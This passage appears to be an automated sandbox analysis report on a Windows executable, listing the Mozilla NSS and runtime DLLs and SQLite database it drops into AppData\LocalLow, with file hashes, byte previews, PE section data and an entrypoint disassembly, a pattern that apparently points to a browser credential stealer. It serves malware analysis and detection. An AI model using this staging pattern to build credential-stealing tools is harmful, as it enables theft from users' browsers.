SHA-256:	7F93B70257D966EA1C1A6038892B19E8360AADD8E8AE58E75EBB0697B9EA8786
SHA-512:	92ADC4C905A800F8AB5C972B166099382F930435694D5F9A45D1FDE3FEF94FAC57FD8FAFF56FFCFCFDBC61A43E6395561B882966BE0C814ECC7E672C67E6765A
Malicious:	false
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...........l...l...l.......l..~....l..9...l..~....l..~....l..~....l.......l..l....l...l...l...l...l..l....l..l....l..l....l..l..l..l....l..Rich.l..........................PE..L...z@.\.........."!.........2......................................................t.....@...........................................x...............................T...............................@............................................text.............................. ..`.rdata..>...........................@..@.data...............................@....rodata.8...........................@..@.rsrc...x...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\libEGL.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22480
Entropy (8bit):	6.528357540966124
Encrypted:	false
SSDEEP:	384:INZ9mLVDAffJJKAtn0mLAb8X3FbvDG8A3OPLonzvGb:4mx+fXvn4YFrDG8MKb
MD5:	96B879B611B2BBEE85DF18884039C2B8
SHA1:	00794796ACAC3899C1FB9ABBF123FEF3CC641624
SHA-256:	7B9FC6BE34F43D39471C2ADD872D5B4350853DB11CC66A323EF9E0C231542FB9
SHA-512:	DF8F1AA0384A5682AE47F212F3153D26EAFBBF12A8C996428C3366BEBE16850D0BDA453EC5F4806E6A62C36D312D37B8BBAFF549968909415670C9C61A6EC49A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...N{.N{.N{.6..N{.F,z.N{.F,x.N{.F,~.N{.F,..N{..z.N{.T-z.N{.Nz..N{.T-~.N{.T-{.N{.T-..N{.T-y.N{.Rich.N{.........................PE..L...aA.\.........."!.........(............... ...............................p......~.....@..........................%..........d....P..x............:.......`.......!..T............................"..@............ ...............................text... ........................... ..`.rdata....... ......................@..@.data........@.......2..............@....rsrc...x....P.......4..............@..@.reloc.......`.......8..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83408
Entropy (8bit):	6.436278889454398
Encrypted:	false
SSDEEP:	1536:CNr03+TtFKytqB0EeCsu1sW+cdQOTki9jHiU:CNrDKHBBjXQSki9OU
MD5:	385A92719CC3A215007B83947922B9B5
SHA1:	38DE6CA70CEE1BAD84BED29CE7620A15E6ABCD10
SHA-256:	06EF2010B738FBE99BCDEBBF162473A4EE090678BB6862EEB0D4C7A8C3F225BB
SHA-512:	9F0DFF00C7E72D7017AECE3FA5C31A9C2C2AA0CCC6606D2561CE8D36A4A1F0AB8DC452E2C65E9F4B6CD32BBB8ADA1FF7C865126A5F318719579DB763E4C4183F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........mR;...;...;.......2.......G.......).......*.......".......4.......>...;...n.......:.......:.......:.......:...Rich;...........................PE..L....=.\.........."!.........................................................`......>.....@.............................l.......<....@..P............(.......P..d...0...T...............................@............................................text............................... ..`.rdata..Z[.......\..................@..@.data........ ......................@....rsrc...P....@......................@..@.reloc..d....P......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32_InUse.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83408
Entropy (8bit):	6.436278889454398
Encrypted:	false
SSDEEP:	1536:CNr03+TtFKytqB0EeCsu1sW+cdQOTki9jHiU:CNrDKHBBjXQSki9OU
MD5:	385A92719CC3A215007B83947922B9B5
SHA1:	38DE6CA70CEE1BAD84BED29CE7620A15E6ABCD10
SHA-256:	06EF2010B738FBE99BCDEBBF162473A4EE090678BB6862EEB0D4C7A8C3F225BB
SHA-512:	9F0DFF00C7E72D7017AECE3FA5C31A9C2C2AA0CCC6606D2561CE8D36A4A1F0AB8DC452E2C65E9F4B6CD32BBB8ADA1FF7C865126A5F318719579DB763E4C4183F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........mR;...;...;.......2.......G.......).......*.......".......4.......>...;...n.......:.......:.......:.......:...Rich;...........................PE..L....=.\.........."!.........................................................`......>.....@.............................l.......<....@..P............(.......P..d...0...T...............................@............................................text............................... ..`.rdata..Z[.......\..................@..@.data........ ......................@....rsrc...P....@......................@..@.reloc..d....P......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozglue.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	137168
Entropy (8bit):	6.784614237836286
Encrypted:	false
SSDEEP:	3072:Z6s2DIGLXlNJJcPoN0j/kVqhp1qt/TXTv7q1D2JJJvPhrSeXZ5dR:MszGLXlNrE/kVqhp12/TXTjSD2JJJvPt
MD5:	EAE9273F8CDCF9321C6C37C244773139
SHA1:	8378E2A2F3635574C106EEA8419B5EB00B8489B0
SHA-256:	A0C6630D4012AE0311FF40F4F06911BCF1A23F7A4762CE219B8DFFA012D188CC
SHA-512:	06E43E484A89CEA9BA9B9519828D38E7C64B040F44CDAEB321CBDA574E7551B11FEA139CE3538F387A0A39A3D8C4CBA7F4CF03E4A3C98DB85F8121C2212A9097
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...{>.\.........."!.....z...................................................@......j.....@A........................@...t.......,.... ..x....................0..l.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..l....0......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\msvcp140.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	440120
Entropy (8bit):	6.652844702578311
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\nss3.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1245136
Entropy (8bit):	6.766715162066988
Encrypted:	false
SSDEEP:	24576:ido5Js2a56/+VwJebKj5KYFsRjzx5ZxKV6D1Z4Go/LCiytoxq2Zwn5hCM4MSRdY8:Q2aY4w6aozx5ZWMM7yew8MSRK1y
MD5:	02CC7B8EE30056D5912DE54F1BDFC219
SHA1:	A6923DA95705FB81E368AE48F93D28522EF552FB
SHA-256:	1989526553FD1E1E49B0FEA8036822CA062D3D39C4CAB4A37846173D0F1753D5
SHA-512:	0D5DFCF4FB19B27246FA799E339D67CD1B494427783F379267FB2D10D615FFB734711BAB2C515062C078F990A44A36F2D15859B1DACD4143DCC35B5C0CEE0EF5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c.4.'.Z.'.Z.'.Z.....3.Z...[.%.Z.B..#.Z...Y.*.Z..._.-.Z...^.,.Z...[./.Z..[.$.Z.'.[...Z..^.-.Z..Z.&.Z...&.Z..X.&.Z.Rich'.Z.........................PE..L....@.\.........."!.........................................................@......Q.....@................................x=..T.......p........................\|......T...........................h...@............................................text............................... ..`.rdata...Q.......R..................@..@.data...tG...`..."...>..............@....rsrc...p............`..............@..@.reloc...\|.......~...d..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssckbi.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	336336
Entropy (8bit):	7.0315399874711995
Encrypted:	false
SSDEEP:	6144:8bndzEL04gF85K9autIMyEhZ/V3psPyHa9tBe1:8bndzEL04pnutIMyAp2z9tBe1
MD5:	BDAF9852F588C86B055C846B53D4C144
SHA1:	03B739430CF9EADE21C977B5B416C4DD94528C3B
SHA-256:	2481DA1C459A2429A933D19AD6AE514BD2AE59818246DDB67B0EF44146CED3D8
SHA-512:	19D9A952A3DF5703542FA52A5A780C2E04D6A132059F30715954EAC40CD1C3F3B119A29736D4A911BE85086AFE08A54A7482FA409DFD882BAC39037F9EECD7EF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pi.Pi.Pi.(..Pi.F2h.Pi.F2j.Pi.F2l.Pi.F2m.Pi.0h.Pi.T3h.Pi.Ph.Pi.T3m.Pi.T3i.Pi.T3..Pi.T3k.Pi.Rich.Pi.........PE..L....@.\.........."!.........`......q........................................@...........@.............................P.......d.......x.......................t)..p...T..............................@............................................text.............................. ..`.rdata..>...........................@..@.data....N.......L..................@....rsrc...x...........................@..@.reloc..t).......*..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssdbm3.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	92624
Entropy (8bit):	6.639527605275762
Encrypted:	false
SSDEEP:	1536:YvNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41Pc:+NGVOiBZbcGmxXMcBqmzoCUZoZebHPAT
MD5:	94919DEA9C745FBB01653F3FDAE59C23
SHA1:	99181610D8C9255947D7B2134CDB4825BD5A25FF
SHA-256:	BE3987A6CD970FF570A916774EB3D4E1EDCE675E70EDAC1BAF5E2104685610B0
SHA-512:	1A3BB3ECADD76678A65B7CB4EBE3460D0502B4CA96B1399F9E56854141C8463A0CFCFFEDF1DEFFB7470DDFBAC3B608DC10514ECA196D19B70803FBB02188E15E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L....@.\.........."!.........0...............0......................................*q....@......................... ?......(@.......`..x............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..D....0... ..................@..@.data........P.......>..............@....rsrc...x....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\prldap60.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24016
Entropy (8bit):	6.532540890393685
Encrypted:	false
SSDEEP:	384:TQJMOeAdiNcNUO3qgpw6MnTmJk0llEEHAnDl3vDG8A3OPLondJJs2z:KMaNqb6MTmVllEK2p/DG8MlsQ
MD5:	6099C438F37E949C4C541E61E88098B7
SHA1:	0AD03A6F626385554A885BD742DFE5B59BC944F5
SHA-256:	46B005817868F91CF60BAA052EE96436FC6194CE9A61E93260DF5037CDFA37A5
SHA-512:	97916C72BF75C11754523E2BC14318A1EA310189807AC8059C5F3DC1049321E5A3F82CDDD62944EA6688F046EE02FF10B7DDF8876556D1690729E5029EA414A9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:`wq[.$q[.$q[.$x#.$s[.$.9.%s[.$.9.%p[.$.9.%{[.$.9.%z[.$S;.%s[.$.8.%t[.$q[.$=[.$.8.%t[.$.8.%p[.$.8.$p[.$.8.%p[.$Richq[.$........PE..L....@.\.........."!..... ... .......%.......0...............................p......./....@..........................5......p7..x....P..x............@.......`..$...`1..T............................1..@............0..,............................text...2........ .................. ..`.rdata.......0.......$..............@..@.data...4....@.......4..............@....rsrc...x....P.......8..............@..@.reloc..$....`.......<..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\qipcap.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	16336
Entropy (8bit):	6.437762295038996
Encrypted:	false
SSDEEP:	192:aPgr1ZCb2vGJ7b20qKvFej7x0KDWpH3vUA397Ae+PjPonZwC7Qm:aYpZPGJP209F4vDG8A3OPLonZwC7X
MD5:	F3A355D0B1AB3CC8EFFCC90C8A7B7538
SHA1:	1191F64692A89A04D060279C25E4779C05D8C375
SHA-256:	7A589024CF0EEB59F020F91BE4FE7EE0C90694C92918A467D5277574AC25A5A2
SHA-512:	6A9DB921156828BCE7063E5CDC5EC5886A13BD550BA8ED88C99FA6E7869ECFBA0D0B7953A4932EB8381243CD95E87C98B91C90D4EB2B0ACD7EE87BE114A91A9E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s6.7W..7W..7W..>/..5W...5..5W...5..6W...5..>W...5..<W...7..4W..7W..*W...4..6W...4`.6W...4..6W..Rich7W..................PE..L....B.\.........."!......................... ...............................`.......r....@..................................$..P....@..x............".......P.. .... ..T............................ ..@............ ..h............................text...P........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...x....@......................@..@.reloc.. ....P....... ..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\softokn3.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144848
Entropy (8bit):	6.54005414297208
Encrypted:	false
SSDEEP:	3072:8Af6suip+I7FEk/oJz69sFaXeu9CoT2nIVFetBW3D2xkEMk:B6POsF4CoT2OeYMzMk
MD5:	4E8DF049F3459FA94AB6AD387F3561AC
SHA1:	06ED392BC29AD9D5FC05EE254C2625FD65925114
SHA-256:	25A4DAE37120426AB060EBB39B7030B3E7C1093CC34B0877F223B6843B651871
SHA-512:	3DD4A86F83465989B2B30C240A7307EDD1B92D5C1D5C57D47EFF287DC9DAA7BACE157017908D82E00BE90F08FF5BADB68019FFC9D881440229DCEA5038F61CD6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....@.\.........."!.........b...............................................P.......\|....@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\ucrtbase.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142072
Entropy (8bit):	6.809041027525523
Encrypted:	false
SSDEEP:	24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
MD5:	D6326267AE77655F312D2287903DB4D3
SHA1:	1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
SHA-256:	0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
SHA-512:	11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\qO7qM6fA3\vcruntime140.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\rQF69AzBla Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6970840431455908
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5:	00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1:	14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256:	8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512:	159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sqlite3.dll Download File
Process:	C:\Users\user\Desktop\4FGVZW19n7.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	916735
Entropy (8bit):	6.514932604208782
Encrypted:	false
SSDEEP:	24576:BJDwWdxW2SBNTjlY24eJoyGttl3+FZVpsq/2W:BJDvx0BY24eJoyctl3+FTX
MD5:	F964811B68F9F1487C2B41E1AEF576CE
SHA1:	B423959793F14B1416BC3B7051BED58A1034025F
SHA-256:	83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
SHA-512:	565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t\...........!.....Z...................p.....a.......................................... .......................... ......H.... .......................0...3...................................................................................text...XX.......Z..................`.P`.data........p.......`..............@.`..rdata........... ...\|..............@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc...3...0...4..................@.0B/4...........p......................@.@B/19................................@..B/31.......... ......................@..B/45..........@......................@..B/57..........`......................@.0B/70.....i....p..........

\Device\Null Download File
Process:	C:\Windows\SysWOW64\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	92
Entropy (8bit):	4.300553674183507
Encrypted:	false
SSDEEP:	3:hYFEHgARcWmFsFJQZtctFst3g4t32vov:hYFE1mFSQZi3MXt3X
MD5:	F74899957624A2837F2F86E8E62E92D4
SHA1:	1FCDAC5DEC5B0B1E00CF0247DA2A5F18566F1431
SHA-256:	507992A303C447D1D40D36E2E5163A237077B94F23A7089AC90A2F08682AE9BC
SHA-512:	E3FD14728633614B6552A75C15079AC8B04C0E8B3F49535B522C73312B1C812E30A934099AB18B507A0B4878068987D5545E90FA3747F7E7B10360EE324DB435
Malicious:	false
Preview:	..Waiting for 10 seconds, press CTRL+C to quit ..... 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.443604453641275
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	4FGVZW19n7.exe
File size:	557056
MD5:	2158d5620e153aad7e5ab2c6069d4405
SHA1:	fe0b5fd32e385fdc7c1629aab131b0e7743b4b4e
SHA256:	42aaeb5b6de2154e8cee56cd6ecd0fac78a38a2162b037d6b8d82eec526a8b1f
SHA512:	2e121f57236ac98a439275cad42a0c7f5f7269f3fe5c22853b524f8509171ca58b10414d9e5f434b4c57af577ff08544c5c0d1ef97980b8378736c247ef3398a
SSDEEP:	12288:4FmZZG010zVPBx1lqMIL8iFneohBoFsmfJX:4FeZG01qBx7qM0aFsmfJX
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:,.5~M.f~M.f~M.f`..fdM.f`..f.M.f`..fPM.fY..fyM.f~M.f.M.f`..f.M.f`..f.M.f`..f.M.fRich~M.f................PE..L......`...........

File Icon


Icon Hash:	dab1e4c4e4b9c7b8

Static PE Info

General
Entrypoint:	0x40364d
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x6096B5FB [Sat May 8 16:02:03 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	1b81e8f7d77881f7dbd36488c7ba26dc

Entrypoint Preview

Instruction
call 00007F42B51903A0h
jmp 00007F42B518A00Dh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 00479328h
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi
test eax, eax
je 00007F42B518A19Eh
test byte ptr [eax], 00000008h
je 00007F42B518A199h
mov dword ptr [ebp-0Ch], 01994000h
lea eax, dword ptr [ebp-0Ch]
push eax
push dword ptr [ebp-10h]
push dword ptr [ebp-1Ch]
push dword ptr [ebp-20h]
call dword ptr [00479104h]
leave
retn 0008h
mov edi, edi
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, dword ptr [ebp+0Ch]
add eax, 0Ch
mov dword ptr [ebp-04h], eax
mov ebx, dword ptr fs:[00000000h]
mov eax, dword ptr [ebx]
mov dword ptr fs:[00000000h], eax
mov eax, dword ptr [ebp+08h]
mov ebx, dword ptr [ebp+0Ch]
mov ebp, dword ptr [ebp-04h]
mov esp, dword ptr [ebx-04h]
jmp eax
pop ebx
leave
retn 0008h
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax
mov edi, edi
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov esi, dword ptr fs:[00000000h]
mov dword ptr [ebp-04h], esi
mov dword ptr [ebp-08h], 00403707h
push 00000000h
push dword ptr [ebp+0Ch]
push dword ptr [ebp-08h]
push dword ptr [ebp+08h]
call 00007F42B51AFA80h
mov eax, dword ptr [ebp+0Ch]
mov eax, dword ptr [eax+04h]
and eax, FFFFFFFDh
mov ecx, dword ptr [ebp+0Ch]
mov dword ptr [ecx+00h], eax

Rich Headers

Programming Language:

[ C ] VS2008 build 21022
[LNK] VS2008 build 21022
[ASM] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[C++] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7cccc	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8d000	0x1740	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x7bb90	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x79000	0x214	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x775fd	0x77600	False	0.844651914267	data	7.7848424977	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x79000	0x492c	0x4a00	False	0.375105574324	data	5.34536265851	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x7e000	0xe5fc	0xa400	False	0.0572837271341	data	0.735563594794	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x8d000	0x3740	0x1800	False	0.681315104167	data	5.86282843345	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x8e2f0	0x134	data
RT_CURSOR	0x8e440	0x134	data
RT_ICON	0x8d220	0x10a8	data	Spanish	Bolivia
RT_GROUP_CURSOR	0x8e428	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x8e578	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_ICON	0x8e2c8	0x14	data	Spanish	Bolivia
RT_VERSION	0x8e590	0x1b0	data
None	0x8e2e0	0xa	data	Spanish	Bolivia

Imports

DLL	Import
